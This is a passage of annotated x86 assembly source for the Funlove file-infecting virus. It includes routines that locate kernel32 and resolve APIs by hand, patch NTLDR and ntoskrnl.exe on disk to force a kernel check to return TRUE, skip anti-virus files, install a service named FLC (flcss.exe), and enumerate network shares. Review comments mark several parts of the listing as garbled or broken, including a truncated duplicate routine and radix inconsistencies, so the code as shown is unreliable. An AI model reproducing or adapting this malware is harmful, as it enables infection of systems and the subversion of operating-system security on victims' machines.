and eax,0FFF00000 </p>
<p> cmp eax,0BFF00000 <br>
jnz short OS_WinNT? </p>
<p>OS_Win9x: </p>
<p> mov edi,0BFF70000 <br>
jmp short WG_00 </p>
<p>OS_WinNT?: </p>
<p> inc byte ptr [offset OS + ebx] <br>
add esi,08 <br>
cmp eax,077F00000 <br>
jnz short OS_Win2K? </p>
<p> mov edi,eax <br>
jmp short WG_00 </p>
<p>OS_Win2K?: </p>
<p> inc byte ptr [offset OS + ebx] <br>
add esi,08 <br>
cmp eax,077E00000 <br>
jnz short WG_Failed </p>
<p> mov edi,077E80000 </p>
<p>WG_00: </p>
<p> mov edx,edi <br>
mov ecx,20000 </p>
<p>WG_01: <br>
push ecx <br>
mov ecx,08 <br>
push esi <br>
push edi <br>
repz cmpsb <br>
pop edi <br>
pop esi <br>
pop ecx <br>
jz short WG_02 <br>
inc edi <br>
loop WG_01 </p>
<p>WG_Failed: </p>
<p> xor eax,eax <br>
jmp short WG_03 </p>
<p>WG_02: <br>
add edi,03 <br>
mov [offset GetProcAddress + 1 + ebx],edi </p>
<p> mov eax,edx <br>
mov [offset Kernel32_Base + ebx],eax </p>
<p>WG_03: <br>
ret <br>
;***************************************************************************
; DLL_Relocate -- resolve one table of API trampolines through GetProcAddress.
;
; The tables (Kernel32_Functions / ADVAPI32_Functions below) are runs of
; 7-byte stubs `B8 imm32 FF E0` (mov eax,imm32 / jmp eax), each followed by
; the NUL-terminated export name. The resolved address is written into the
; stub's imm32, so a later `call Name` lands on a working trampoline.
;
; In:   DLL_Func, DLL_Base -- not defined in this excerpt. The callers
;       (RelocKernel32 / RelocAdvapi32) push the module base, then the table
;       address, so these look like stack-argument equates -- TODO confirm.
;       The GetProcAddress stub must already be patched (Whereis_GPA does it).
; Out:  stubs patched in place; eax = last GetProcAddress result (0 on stop).
; Clobbers: eax, esi, flags.
;
; NOTE(review): the first export that fails to resolve ends the loop, so
;   every later stub in the table keeps an unpatched imm32 (jmp eax into
;   garbage). There is no per-stub failure marker.
; NOTE(review): this writes into the code image (self-modifying code); it
;   needs the section to be writable as well as executable.
; NOTE(review): the routine ends with `ret`, not `ret 8`, and the visible
;   callers do not adjust esp after the call either -- either the arguments
;   are not really on the stack or this transcription is incomplete. Do not
;   treat the listing as assemblable as-is.
;***************************************************************************
DLL_Relocate:
    mov esi,DLL_Func                ; esi -> first stub of the table
DR_00:
    mov eax,esi
    add eax,07                      ; skip B8 imm32 FF E0 -> export name
    push eax                        ; lpProcName
    push DLL_Base                   ; hModule
    call GetProcAddress             ; through the already-patched trampoline
    or eax,eax
    jz short DR_03                  ; unresolved export: stop here
DR_01:
    mov [esi + 1],eax               ; patch the imm32 of `mov eax,...`
    add esi,07
DR_02:
    lodsb                           ; step past the name, including its NUL
    or al,al
    jnz short DR_02
    cmp byte ptr [esi],0B8          ; another `mov eax,imm32` stub follows?
    jz short DR_00                  ; (the `db 0` after the table ends the walk)
DR_03:
    ret
;**************************************************************************
; BlownAway -- patch NTLDR and ntoskrnl.exe on disk. The original author
; calls this Funlove's "kill shot" and notes he dislikes the technique.
;
; Builds two file names into Buffer1 and calls PatchFile with an OS-specific
; search/replace pair. DirEnd is not defined in this excerpt; from its use it
; looks like an equate for the byte in Buffer1 right after a drive/root
; prefix that some earlier code has already written -- TODO confirm.
;
; OS byte (written by Whereis_GPA above): 0 = Win9x, 1 = NT4, 2 = Win2K --
; here only `OS == 1` selects the NT4 pair; anything else gets the Win2K pair.
;
; What the replacements do, decoded from the tables below:
;   NTLDR:    3B 46 58 74 07 -> 3B 46 58 EB 07   (cmp eax,[esi+58h] / jz +7
;                                                 becomes an unconditional jmp)
;   ntoskrnl: 8A C3 ...      -> B0 01 ...        (mov al,bl -> mov al,1)
;             8A 45 14 ...   -> B0 01 90 ...     (mov al,[ebp+14h] -> mov al,1; nop)
; Both ntoskrnl patterns sit directly before `pop edi/pop esi/pop ebx/pop ebp/
; ret 28h`, i.e. a stdcall routine returning a BOOLEAN in al is forced to
; always return TRUE. Which kernel routine that is cannot be established
; from this listing (public analyses describe it as the access-check
; routine) -- treat as unverified here.
;
; Clobbers: eax, ecx, edx, esi, edi, flags (via PatchFile).
; NOTE(review): the two `movsd` copy 8 bytes out of the 6-byte 'NTLDR',0
;   string, so 2 bytes of NT4_NTLDR land in Buffer1 after the NUL. Harmless
;   for the string, but visible if Buffer1 is dumped.
; NOTE(review): the radix of this transcription is inconsistent: `add esi,10`
;   and `add esi,18` only reach the Win2K patterns if read as decimal (the
;   NT4 tables are 2x5 and 2x9 bytes), while the `5Bh`/`3Bh` suffixes
;   elsewhere imply a hex default radix. Verify before reusing any literal.
;**************************************************************************
BlownAway:
    lea esi,[offset NTLDR + ebx]        ; 'NTLDR',0 (delta-relative)
    mov edi,DirEnd
    movsd
    movsd                               ; 8 bytes -> Buffer1 tail

    lea edi,[offset Buffer1 + ebx]      ; p_Filename
    lea esi,[offset NT4_NTLDR + ebx]    ; p_PatchAddr: NT4 search/replace pair

    cmp byte ptr [offset OS + ebx],01
    jz short BA_00
    add esi,10                          ; not NT4: W2K_NTLDR pair (see radix note)
BA_00:
    push edi
    push esi
    push 05                             ; p_PatchSize: 5-byte pattern
    call PatchFile

    lea esi,[offset NTOSKRNL + ebx]     ; 'WINNT\System32\ntoskrnl.exe',0
    mov edi,DirEnd
BA_01:
    movsb                               ; copy up to and including the NUL
    cmp byte ptr [esi - 1],00
    jnz short BA_01

    lea edi,[offset Buffer1 + ebx]
    lea esi,[offset NT4_NTOSKRNL + ebx]

    cmp byte ptr [offset OS + ebx],01
    jz short BA_02
    add esi,18                          ; not NT4: W2K_NTOSKRNL pair (see radix note)
BA_02:
    push edi
    push esi
    push 09                             ; p_PatchSize: 9-byte pattern
    call PatchFile
    ret
;**************************************************************************
; PatchFile -- in-place search-and-replace of one byte pattern in a file,
; done through a writable file mapping.
;
; In (stack-argument equates, not defined in this excerpt; BlownAway pushes
; name, pattern, size in that order, so [esp+4]=size, [esp+8]=pattern,
; [esp+12]=name -- TODO confirm):
;   p_Filename  -> NUL-terminated path
;   p_PatchAddr -> p_PatchSize bytes to search for, immediately followed by
;                  p_PatchSize replacement bytes
;   p_PatchSize =  pattern length
; Out: nothing meaningful in eax. If the pattern is found, the file is
;      modified on disk (PAGE_READWRITE mapping + FILE_MAP_WRITE view).
; Scratch globals (also undefined here): p_FileHandle, p_FileSize, p_MapHandle.
; Clobbers: eax, ecx, edx, esi, edi, flags.
;
; Only the FIRST occurrence is replaced; the scan stops after it.
; NOTE(review): the loop tries p_FileSize start offsets but compares
;   p_PatchSize bytes at each, so the last p_PatchSize-1 positions read past
;   the end of the view. Page rounding usually hides it, but it is an
;   out-of-bounds read.
; NOTE(review): GetFileSize's error return (-1) is not checked; it would be
;   passed to CreateFileMappingA as the size.
; NOTE(review): OpenFile/MapFile/ViewMap are called with pushed arguments and
;   return with a plain `ret`; no esp adjustment is visible anywhere -- see
;   the transcription caveat on DLL_Relocate.
;**************************************************************************
PatchFile:
    push p_Filename
    push 03                         ; o_OpenMode = OPEN_EXISTING
    call OpenFile

    cmp eax,-1                      ; INVALID_HANDLE_VALUE
    jz short PA_Exit

    mov p_FileHandle,eax

    push 00                         ; lpFileSizeHigh = NULL (>4 GB not handled)
    push eax
    call GetFileSize

    mov p_FileSize,eax

    push p_FileHandle
    push eax
    call MapFile

    or eax,eax
    jz short PA_CloseFile

    mov p_MapHandle,eax

    push eax
    call ViewMap

    or eax,eax
    jz short PA_CloseMap

    mov edx,eax                     ; view base, kept for UnmapViewOfFile

    mov edi,eax                     ; scan cursor
    mov esi,p_PatchAddr
    mov ecx,p_FileSize              ; number of candidate start offsets

PA_00:
    push ecx
    push esi
    push edi
    mov ecx,p_PatchSize
    repz cmpsb                      ; ZF=1 iff all p_PatchSize bytes matched
    pop edi
    pop esi
    pop ecx
    jz short PA_01
    inc edi
    loop PA_00

    jmp short PA_Unmap              ; pattern not present: leave file untouched

PA_01:
    mov ecx,p_PatchSize
    add esi,ecx                     ; esi -> replacement bytes
    repz movsb                      ; (rep; the Z is ignored for movsb) overwrite the match

PA_Unmap:
    push edx
    call UnmapViewOfFile

PA_CloseMap:
    push p_MapHandle
    call CloseHandle

PA_CloseFile:
    push p_FileHandle
    call CloseHandle

PA_Exit:
    ret
;************************************************************************
; GetDelta -- the classic call/pop delta trick: find where the virus body
; actually sits in memory, since it runs at a different address in each host.
;
; Out: ebx = runtime address of VStart. Every `[offset X + ebx]` in this
;      file relies on it; none of the routines in this excerpt write ebx
;      again (and stdcall Win32 APIs preserve it).
; Clobbers: ebx, flags. VStart is defined outside this excerpt.
;************************************************************************
GetDelta:
    call delta                      ; pushes the runtime address of `delta`
delta:
    pop ebx                         ; ebx = runtime address of delta
    sub ebx,offset delta - VStart   ; minus its link-time distance from VStart
    ret
;*************************************************************************
; RelocKernel32 -- locate kernel32 and resolve the Kernel32_Functions table.
; The usual Win32-virus bootstrap: no import table is trusted, everything
; is found by hand.
;
; Whereis_GPA (above; its start is outside this excerpt) returns the
; kernel32 base in eax, or 0 when no OS signature matched, and patches the
; GetProcAddress trampoline as a side effect.
; In:   r_Kernel32 -- not defined here; pushed as Whereis_GPA's argument,
;       TODO confirm what it carries.
; Out:  Kernel32_Functions stubs patched (see DLL_Relocate); eax = 0 when
;       kernel32 could not be located.
; Clobbers: eax, ecx, edx, esi, edi, flags.
; NOTE(review): arguments are pushed for both calls and never popped in the
;   visible code -- transcription caveat, see DLL_Relocate.
;*************************************************************************
RelocKernel32:
    push r_Kernel32
    call Whereis_GPA                ; eax = kernel32 base or 0

    or eax,eax
    jz short RK_00                  ; unsupported OS / signature not found

    push eax                        ; DLL_Base
    lea esi,[offset Kernel32_Functions + ebx]
    push esi                        ; DLL_Func = trampoline table
    call DLL_Relocate
RK_00:
    ret
;***********************************************************************
; RelocAdvapi32 -- load ADVAPI32.dll and resolve the ADVAPI32_Functions
; table (the service-control-manager APIs listed below).
;
; Requires RelocKernel32 to have run first: LoadLibraryA here is the
; trampoline from Kernel32_Functions, so it only works once patched.
; Out:  ADVAPI32_Functions stubs patched; eax = 0 if LoadLibraryA failed.
; Clobbers: eax, esi, flags (plus whatever DLL_Relocate clobbers).
;***********************************************************************
RelocAdvapi32:
    lea eax,[offset ADVAPI32_Name + ebx]
    push eax                        ; "ADVAPI32.dll"
    call LoadLibraryA
    or eax,eax
    jz short RA_00                  ; could not load: leave table unpatched

    push eax                        ; DLL_Base
    lea esi,[offset ADVAPI32_Functions + ebx]
    push esi                        ; DLL_Func
    call DLL_Relocate

RA_00:
    ret
;********************************************************************
; OpenFile -- open a file read/write, exclusively, after forcing its
; attributes so that read-only/hidden/system flags cannot block the open.
;
; In:   o_Filename, o_OpenMode -- stack-argument equates not defined in this
;       excerpt (PatchFile pushes name then disposition) -- TODO confirm.
; Out:  eax = file handle, or INVALID_HANDLE_VALUE (-1) from CreateFileA.
; Clobbers: eax, flags.
;
; NOTE(review): the SetFileAttributesA result is ignored and the original
;   attributes are never restored in this excerpt; the attribute change on a
;   system file is itself a detectable artifact.
; NOTE(review): literals `20` and `80` match FILE_ATTRIBUTE_ARCHIVE (20h) and
;   FILE_ATTRIBUTE_NORMAL (80h) only under a hex default radix -- see the
;   radix caveat on BlownAway.
;********************************************************************
OpenFile:
    push 20                         ; FILE_ATTRIBUTE_ARCHIVE: strip RO/H/S first
    push o_Filename
    call SetFileAttributesA

    push 00                         ; hTemplateFile
    push 80                         ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
    push o_OpenMode                 ; dwCreationDisposition
    push 00                         ; lpSecurityAttributes
    push 00                         ; dwShareMode = 0: exclusive
    push 0C0000000                  ; GENERIC_READ | GENERIC_WRITE
    push o_Filename
    call CreateFileA
    ret
;*********************************************************************
; NOTE(review): this block is a truncated DUPLICATE of the MapFile routine
; that immediately follows it -- an artifact of the page this listing was
; copied from. The call target is cut short (`CreateFileM`) and there is no
; `ret`, and a second `MapFile:` label would not assemble. Ignore this copy
; and read the complete one below.
;*********************************************************************
MapFile:
    push 00
    push m_FileSize
    push 00
    push 04
    push 00
    push m_FileHandle
    call CreateFileM
;*********************************************************************
; MapFile -- create a read/write file-mapping object over the whole file.
;
; In:   m_FileHandle, m_FileSize -- stack-argument equates not defined in
;       this excerpt (PatchFile pushes handle then size) -- TODO confirm.
; Out:  eax = mapping handle, or 0 on failure.
; Clobbers: eax, flags.
; PAGE_READWRITE (04) means a FILE_MAP_WRITE view of this mapping writes
; straight through to the file; this is how PatchFile modifies files.
;*********************************************************************
MapFile:
    push 00                         ; lpName = NULL (unnamed mapping)
    push m_FileSize                 ; dwMaximumSizeLow
    push 00                         ; dwMaximumSizeHigh
    push 04                         ; flProtect = PAGE_READWRITE
    push 00                         ; lpAttributes
    push m_FileHandle
    call CreateFileMappingA
    ret
;*********************************************************************
; ViewMap -- map the whole file-mapping object into memory for writing.
;
; In:   v_MapHandle -- stack-argument equate not defined in this excerpt
;       (PatchFile pushes the mapping handle) -- TODO confirm.
; Out:  eax = view base address, or 0 on failure.
; Clobbers: eax, flags.
;*********************************************************************
ViewMap:
    push 00                         ; dwNumberOfBytesToMap = 0: whole mapping
    push 00                         ; dwFileOffsetLow
    push 00                         ; dwFileOffsetHigh
    push 02                         ; dwDesiredAccess = FILE_MAP_WRITE
    push v_MapHandle
    call MapViewOfFile
    ret                             ; eax = view base or 0
;*******************************************************************
; Wait_A_Little -- rate limiter: once more than 4000 ticks (ms) have passed
; since `Tick`, sleep for 16000 ms and restart the window; otherwise return
; at once. Presumably used to pace scanning/infection activity -- the
; callers are outside this excerpt.
;
; In:   Tick (dword, delta-relative) = GetTickCount at the last reset.
; Out:  Tick updated after a sleep.
; Clobbers: eax, flags.
; NOTE(review): under a hex default radix these are 4000h ~= 16 s and
;   16000h ~= 90 s rather than 4 s and 16 s -- see the radix caveat on
;   BlownAway. Either way the long Sleep is a recognisable behavioural
;   signature in a sandbox.
;***********************************************************************
Wait_A_Little:
    call GetTickCount
    sub eax,[offset Tick + ebx]     ; ms elapsed since Tick (wraps cleanly)
    cmp eax,4000
    jc short WAL_00                 ; unsigned below: window not over yet

    push 16000
    call Sleep

    call GetTickCount
    mov [offset Tick + ebx],eax     ; start a new window
WAL_00:
    ret
;***********************************************************************
; GetRand -- linear-congruential pseudo-random step:
;   Rand = (Rand * 7FFFFFFFh + 1) mod 0FFFFFFFBh      (modulus = 2^32-5, prime)
;
; In:   Rand (dword, delta-relative) = current state; how it is seeded is
;       outside this excerpt.
; Out:  eax = new Rand (also stored back).
; Preserves ecx, edx; clobbers eax, flags.
;
; Fully deterministic from the seed -- fine for the author's purposes, not a
; secure source of randomness. The `inc eax` cannot carry into edx (inc does
; not set CF and no adc follows), so an eax of 0FFFFFFFFh wraps to 0 before
; the divide; the quotient always fits in 32 bits, so `div` cannot fault.
;***********************************************************************
GetRand:
    push ecx
    push edx
    mov eax,[offset Rand + ebx]     ; current state
    xor edx,edx
    mov ecx,7FFFFFFF
    mul ecx                         ; edx:eax = Rand * 7FFFFFFFh
    inc eax                         ; + 1 (low dword only)
    mov ecx,0FFFFFFFBh
    div ecx                         ; edx = (edx:eax) mod (2^32-5)
    mov eax,edx
    mov [offset Rand + ebx],eax     ; new state is also the return value
    pop edx
    pop ecx
    ret
;*********************************************************************
; Data
;*********************************************************************
HostCode db 8 dup (?)           ; 8 saved host bytes -- filled by code outside
                                ; this excerpt (presumably the original entry
                                ; bytes that get restored later -- TODO confirm)

; 8-byte signatures Whereis_GPA scans kernel32 for, one per OS; it advances
; esi by 8 per attempt and adds 3 to the hit address (L41 above), so the
; first 3 bytes of each signature belong to the tail of the preceding
; function and the remaining 5 are the GetProcAddress prologue.
GPA_Sigs:

W9x db 0C2,04,00,57,6A,22,2Bh,0D2       ; ret 4 | push edi / push 22h / sub edx,edx
NT4 db 0C2,04,00,55,8Bh,4C,24,0C        ; ret 4 | push ebp / mov ecx,[esp+0Ch]
W2K db 00F,00,00,55,8Bh,0ECh,51,51      ; ??    | push ebp / mov ebp,esp / push ecx / push ecx
                                        ; (the leading 0F 00 00 does not decode to
                                        ; a plausible function tail -- possibly a
                                        ; transcription error; verify against a
                                        ; real Win2K kernel32 before trusting it)

NTLDR db 'NTLDR',0                      ; copied into Buffer1 by BlownAway

; NTLDR search/replace pairs: 5-byte pattern followed by 5-byte replacement.
; 74 07 (jz +7) -> EB 07 (jmp +7): a conditional branch made unconditional.
NT4_NTLDR db 3Bh,46,58,74,07            ; cmp eax,[esi+58h] / jz  +7   (NT4)
db 3Bh,46,58,0EBh,07                    ; cmp eax,[esi+58h] / jmp +7
W2K_NTLDR db 3Bh,47,58,74,07            ; cmp eax,[edi+58h] / jz  +7   (Win2K)
db 3Bh,47,58,0EBh,07                    ; cmp eax,[edi+58h] / jmp +7

; Relative path: the drive/root prefix must already be in Buffer1 (see DirEnd
; in BlownAway). Hard-coded 'WINNT', so non-default install dirs are missed.
NTOSKRNL db 'WINNT\System32\ntoskrnl.exe',0

; ntoskrnl search/replace pairs: 9-byte pattern followed by 9-byte replacement.
; Each pattern is the epilogue `pop edi/pop esi/pop ebx/pop ebp/ret 28h` of a
; stdcall routine, preceded by the instruction that sets its BOOLEAN result
; in al; the replacement hard-wires al = 1 (TRUE).
NT4_NTOSKRNL db 8A,0C3,5F,5E,5Bh,5Dh,0C2,28,00  ; mov al,bl        / epilogue (NT4)
db 0B0,01,5F,5E,5Bh,5Dh,0C2,28,00               ; mov al,1         / epilogue
W2K_NTOSKRNL db 8A,45,14,5F,5E,5Bh,5Dh,0C2,28   ; mov al,[ebp+14h] / epilogue (Win2K)
db 0B0,01,90,5F,5E,5Bh,5Dh,0C2,28               ; mov al,1 ; nop   / epilogue
;***********************************************************************
; File names that are NOT infected -- mostly anti-virus products (the
; original comment invites adding domestic Chinese AV names). Each entry is
; a dword encoding of the first four characters of the name given in the
; comment; the encoding/hash and the comparison code are outside this
; excerpt, so these values cannot be decoded from here.
; NOTE(review): the last four entries (smss, ddhelp, dplayx, mplayer) are
;   system/DirectX binaries rather than AV products, despite the heading --
;   presumably skipped because infecting them breaks the system or the
;   infection would be noticed.
;***********************************************************************
SkipNames:

    dd 139D7300h ; aler   (alert?)
    dd 0F977200h ; amon   (NOD32 AMON)
    dd 118E7E1Eh ; _avp   (Kaspersky AVP)
    dd 52886900h ; avp3
    dd 0C886900h ; avpm
    dd 13883207h ; f-pr   (F-Prot)
    dd 168E7E0Fh ; navw   (Norton AntiVirus)
    dd 0F997C12h ; scan   (McAfee Scan)
    dd 128B7212h ; smss   (smss.exe -- not an AV)
    dd 04907B05h ; ddhe   (ddhelp.exe)
    dd 00946F05h ; dpla   (dplayx)
    dd 00946F0Ch ; mpla   (mplayer)

; Names used by the dropped component: its process image and its Win32
; service name. The code that creates them (CreateProcessA / CreateServiceA
; are in the tables below) is outside this excerpt.
Process db 'flcss.exe',0
Service db 'FLC',0
; Import directory the virus carries with it (IMAGE_IMPORT_DESCRIPTOR layout):
; one module (KERNEL32.dll) importing a single export, Beep. Presumably this
; gives the infected image a minimal valid import table so the loader maps
; kernel32; the real API resolution is done by Whereis_GPA/DLL_Relocate.
; NOTE(review): the trailing `db 14 dup (0)` is only a full 20-byte null
;   terminator descriptor if 14 is read as hex (14h = 20) -- radix caveat as
;   on BlownAway.
; NOTE(review): neither Kernel32_Pointers nor Kernel32_Relocated is followed
;   by a terminating zero dword in this listing; a loader walking the INT
;   would read the next dword(s) as further entries. Likely a transcription
;   gap; do not take this table as a faithful copy.

VImports:
    dd offset Kernel32_Pointers     ; OriginalFirstThunk (INT)
    dd -1,-1                        ; TimeDateStamp, ForwarderChain
    dd offset Kernel32_Name         ; Name -> 'KERNEL32.dll'
    dd offset Kernel32_Relocated    ; FirstThunk (IAT)
    db 14 dup (0)                   ; null descriptor (see radix note)

Kernel32_Pointers dd offset Kernel32_Beep   ; INT entry -> hint/name
Kernel32_Relocated dd offset Kernel32_Beep  ; IAT entry, overwritten by the loader
Kernel32_Beep db ?,?,'Beep',0               ; IMAGE_IMPORT_BY_NAME: 2-byte hint + name
<p>;*************************************************************************<br>
; 病毒要调用的一些API,找点资料啃一啃吧,MASM32里的INC文件你能啃完的话,<br>
你就是绝顶高手了, <br>
; <br>
; 注: 绝顶高手--------没有头发的高手 <br>
;*************************************************************************<br>
Kernel32_Name db 'KERNEL32.dll',0 <br>
Kernel32_Functions: </p>
<p>CloseHandle: db 0B8,4 dup(?),0FF,0E0,'CloseHandle',0 <br>
CreateFileA: db 0B8,4 dup(?),0FF,0E0,'CreateFileA',0 <br>
CreateFileMappingA: db 0B8,4 dup(?),0FF,0E0,'CreateFileMappingA',0 <br>
CreateProcessA: db 0B8,4 dup(?),0FF,0E0,'CreateProcessA',0 <br>
CreateThread: db 0B8,4 dup(?),0FF,0E0,'CreateThread',0 <br>
FindFirstFileA: db 0B8,4 dup(?),0FF,0E0,'FindFirstFileA',0 <br>
FindNextFileA: db 0B8,4 dup(?),0FF,0E0,'FindNextFileA',0 <br>
FindClose: db 0B8,4 dup(?),0FF,0E0,'FindClose',0 <br>
GetCurrentProcessId: db 0B8,4 dup(?),0FF,0E0,'GetCurrentProcessId',0 <br>
GetDriveTypeA: db 0B8,4 dup(?),0FF,0E0,'GetDriveTypeA',0 <br>
GetFileSize: db 0B8,4 dup(?),0FF,0E0,'GetFileSize',0 <br>
GetProcAddress: db 0B8,4 dup(?),0FF,0E0,'GetProcAddress',0 <br>
GetTickCount: db 0B8,4 dup(?),0FF,0E0,'GetTickCount',0 <br>
GetSystemDirectoryA: db 0B8,4 dup(?),0FF,0E0,'GetSystemDirectoryA',0 <br>
LoadLibraryA: db 0B8,4 dup(?),0FF,0E0,'LoadLibraryA',0 <br>
MapViewOfFile: db 0B8,4 dup(?),0FF,0E0,'MapViewOfFile',0 <br>
ReadFile: db 0B8,4 dup(?),0FF,0E0,'ReadFile',0 <br>
SetFileAttributesA: db 0B8,4 dup(?),0FF,0E0,'SetFileAttributesA',0 <br>
SetFileTime: db 0B8,4 dup(?),0FF,0E0,'SetFileTime',0 <br>
Sleep: db 0B8,4 dup(?),0FF,0E0,'Sleep',0 <br>
UnmapViewOfFile: db 0B8,4 dup(?),0FF,0E0,'UnmapViewOfFile',0 <br>
VirtualAlloc: db 0B8,4 dup(?),0FF,0E0,'VirtualAlloc',0 <br>
VirtualFree: db 0B8,4 dup(?),0FF,0E0,'VirtualFree',0 <br>
WriteFile: db 0B8,4 dup(?),0FF,0E0,'WriteFile',0 </p>
; Original comment: "the following API does not exist in Win9x".
; NOTE(review): that is the reverse of the usual documentation --
;   RegisterServiceProcess is the Win9x-only kernel32 export (hides a
;   process from the task list) and is absent on NT. Either way it sits
;   AFTER the `db 0` terminator, so DLL_Relocate's generic walk never
;   resolves it; the code that does (conditionally) is outside this excerpt.

    db 0                            ; end of Kernel32_Functions for DLL_Relocate
RegisterServiceProcess: db 0B8,4 dup(?),0FF,0E0,'RegisterServiceProcess',0

; USER32: a single window-class registration -- resolver not in this excerpt.
USER32_Name db 'USER32.dll',0
RegisterClassA: db 0B8,4 dup(?),0FF,0E0,'RegisterClassA',0

; ADVAPI32: Service Control Manager APIs, resolved by RelocAdvapi32. Together
; with the 'FLC' / 'flcss.exe' strings above these are consistent with
; installing and running the dropped component as an NT service; the code
; that does so is not in this excerpt.
ADVAPI32_Name db 'ADVAPI32.dll',0
ADVAPI32_Functions:

OpenSCManagerA: db 0B8,4 dup(?),0FF,0E0,'OpenSCManagerA',0
OpenServiceA: db 0B8,4 dup(?),0FF,0E0,'OpenServiceA',0
CreateServiceA: db 0B8,4 dup(?),0FF,0E0,'CreateServiceA',0
StartServiceA: db 0B8,4 dup(?),0FF,0E0,'StartServiceA',0
StartServiceCtrlDispatcherA: db 0B8,4 dup(?),0FF,0E0,'StartServiceCtrlDispatcherA',0
RegisterServiceCtrlHandlerA: db 0B8,4 dup(?),0FF,0E0,'RegisterServiceCtrlHandlerA',0
SetServiceStatus: db 0B8,4 dup(?),0FF,0E0,'SetServiceStatus',0
; NOTE(review): no `db 0` terminator follows SetServiceStatus in this
;   listing; DLL_Relocate would run into MPR_Name, whose first byte is 'M',
;   not B8, so the walk still stops -- by accident rather than design.

; MPR: network-resource enumeration (WNet*), i.e. share discovery for
; spreading over the network. Resolver not in this excerpt.
MPR_Name db 'MPR.dll',0

MPR_Functions:

WNetOpenEnumA: db 0B8,4 dup(?),0FF,0E0,'WNetOpenEnumA',0
WNetEnumResourceA: db 0B8,4 dup(?),0FF,0E0,'WNetEnumResourceA',0
WNetCloseEnum: db 0B8,4 dup(?),0FF,0E0,'WNetCloseEnum',0
; End of the virus body proper (original comment: "the virus should end
; here"). Everything after `vend` is per-instance runtime state and scratch
; space; whether it is copied into infected hosts is decided by code outside
; this excerpt.
vend:

Kernel32_Base dd ?                  ; kernel32 base, written by Whereis_GPA
Rand dd ?                           ; PRNG state, see GetRand
Tick dd ?                           ; GetTickCount at last Wait_A_Little reset
OS db ?                             ; 0 = Win9x, 1 = NT4, 2 = Win2K (Whereis_GPA)

ALIGN 100

Buffer1 db 200 dup (0)              ; current directory / file path (see BlownAway, DirEnd)
Buffer2 db 200 dup (?)
Buffer3 db 2000 dup (?)             ; original comment: holds the file read in
                                    ; NOTE(review): sizes are 200h/2000h under a
                                    ; hex default radix -- see the radix caveat
                                    ; on BlownAway
<p>CODE ENDS </p>
<p>END main <br>